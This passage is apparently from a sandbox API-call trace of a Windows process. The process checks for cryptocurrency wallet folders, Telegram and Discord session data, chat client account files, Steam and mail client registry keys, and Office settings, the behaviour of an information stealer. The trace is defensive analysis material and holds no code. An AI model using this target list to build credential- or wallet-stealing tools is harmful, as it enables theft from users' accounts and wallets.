(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DashCore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dashcore")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Bitcoin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bitcoin")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WalletWasabi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\walletwasabi")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Daedalus Mainnet" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\daedalus mainnet")) returned 0xffffffff [0134.854] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.854] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.854] GetFileAttributesA (lpFileName="\\Users\\5p5NrGJn0jS HALPmcxz\\documents\\Monero" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\monero")) returned 0xffffffff [0134.854] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.854] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.854] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.854] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0134.854] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Valve\\Steam", phkResult=0x36f504 | out: phkResult=0x36f504*=0x0) returned 0x2 [0134.854] RegQueryValueExA (in: hKey=0x0, lpValueName="SteamPath", lpReserved=0x0, lpType=0x0, lpData=0x36f0f0, lpcbData=0x36f30c*=0x200 | out: lpType=0x0, lpData=0x36f0f0*=0x0, lpcbData=0x36f30c*=0x200) returned 0x6 [0134.854] RegCloseKey (hKey=0x0) returned 0x6 [0134.855] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1", phkResult=0x36f4b8 | out: phkResult=0x36f4b8*=0x0) returned 0x2 [0134.855] RegQueryValueExA (in: hKey=0x0, lpValueName="InstallLocation", lpReserved=0x0, lpType=0x0, lpData=0x36f200, lpcbData=0x36f41c*=0x200 | out: lpType=0x0, lpData=0x36f200*=0x20, lpcbData=0x36f41c*=0x200) returned 0x6 [0134.855] RegCloseKey (hKey=0x0) returned 0x6 [0134.855] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Classes\\tdesktop.tg\\DefaultIcon", phkResult=0x36f530 | out: phkResult=0x36f530*=0x0) returned 0x2 [0134.855] RegQueryValueExA (in: hKey=0x0, lpValueName="", lpReserved=0x0, lpType=0x0, lpData=0x36f200, lpcbData=0x36f41c*=0x200 | out: lpType=0x0, lpData=0x36f200*=0x20, lpcbData=0x36f41c*=0x200) returned 0x6 [0134.855] RegCloseKey (hKey=0x0) returned 0x6 [0134.855] GetEnvironmentVariableA (in: lpName="AppData", lpBuffer=0x36f010, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.855] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.855] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Telegram Desktop\\tdata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\telegram desktop\\tdata")) returned 0xffffffff [0134.855] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.855] GetEnvironmentVariableA (in: lpName="AppData", lpBuffer=0x36f0a8, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.855] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.855] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\discord\\Local Storage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\discord\\local storage")) returned 0xffffffff [0134.855] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.855] GetEnvironmentVariableA (in: lpName="appdata", lpBuffer=0x36f068, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.855] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.856] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0134.856] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.purple\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\.purple\\accounts.xml")) returned 0xffffffff [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Psi+\\profiles\\default\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\psi+\\profiles\\default\\accounts.xml")) returned 0xffffffff [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Psi\\profiles\\default\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\psi\\profiles\\default\\accounts.xml")) returned 0xffffffff [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.purple\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\.purple\\accounts.xml")) returned 0xffffffff [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Psi\\profiles\\default\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\psi\\profiles\\default\\accounts.xml")) returned 0xffffffff [0134.856] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Psi+\\profiles\\default\\accounts.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\psi+\\profiles\\default\\accounts.xml")) returned 0xffffffff [0134.856] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0134.856] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0134.856] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.856] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.856] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Classes\\Foxmail.url.mailto\\Shell\\open\\command", phkResult=0x36f4bc | out: phkResult=0x36f4bc*=0x0) returned 0x2 [0134.856] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0134.856] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office", phkResult=0x36f474 | out: phkResult=0x36f474*=0x5a4) returned 0x0 [0134.856] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9145620 [0134.857] RegEnumKeyA (in: hKey=0x5a4, dwIndex=0x0, lpName=0x9145620, cchName=0x400 | out: lpName="14.0") returned 0x0 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2b8 [0134.857] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", phkResult=0x36f44c | out: phkResult=0x36f44c*=0x5a8) returned 0x0 [0134.857] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2b8 | out: hHeap=0x3f0000) returned 1 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2b8 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91283f0 [0134.857] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x0, lpName=0x91283f0, cchName=0x400 | out: lpName="Access") returned 0x0 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.857] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0134.857] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.857] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.857] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0134.857] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="File MRU") returned 0x0 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.858] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.858] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.858] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.858] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x0 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.858] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.858] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x0 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.858] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\Security\\Trusted Locations", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.858] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.859] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="Location2") returned 0x0 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0134.859] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\Security\\Trusted Locations\\Location2", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0134.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.859] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0134.859] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.859] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="Location2") returned 0x103 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.859] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.859] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x103 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.859] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.860] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="Settings") returned 0x0 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\Settings", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.860] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="CommandBars") returned 0x0 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.860] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Access\\Settings\\CommandBars", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.860] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.860] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.860] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="CommandBars") returned 0x103 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.860] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.860] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="Settings") returned 0x103 [0134.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0134.861] RegCloseKey (hKey=0x5ac) returned 0x0 [0134.861] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x1, lpName=0x91283f0, cchName=0x400 | out: lpName="Common") returned 0x0 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.861] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0134.861] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="CustomUIValidationCache") returned 0x0 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.861] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\CustomUIValidationCache", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.861] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.862] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.862] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="DrawAlerts") returned 0x0 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.862] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\DrawAlerts", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.862] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="FTP Sites") returned 0x0 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.862] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\DrawAlerts\\FTP Sites", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.862] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.862] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.862] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="FTP Sites") returned 0x103 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.863] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.863] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="General") returned 0x0 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.863] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\General", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.863] RegEnumKeyA 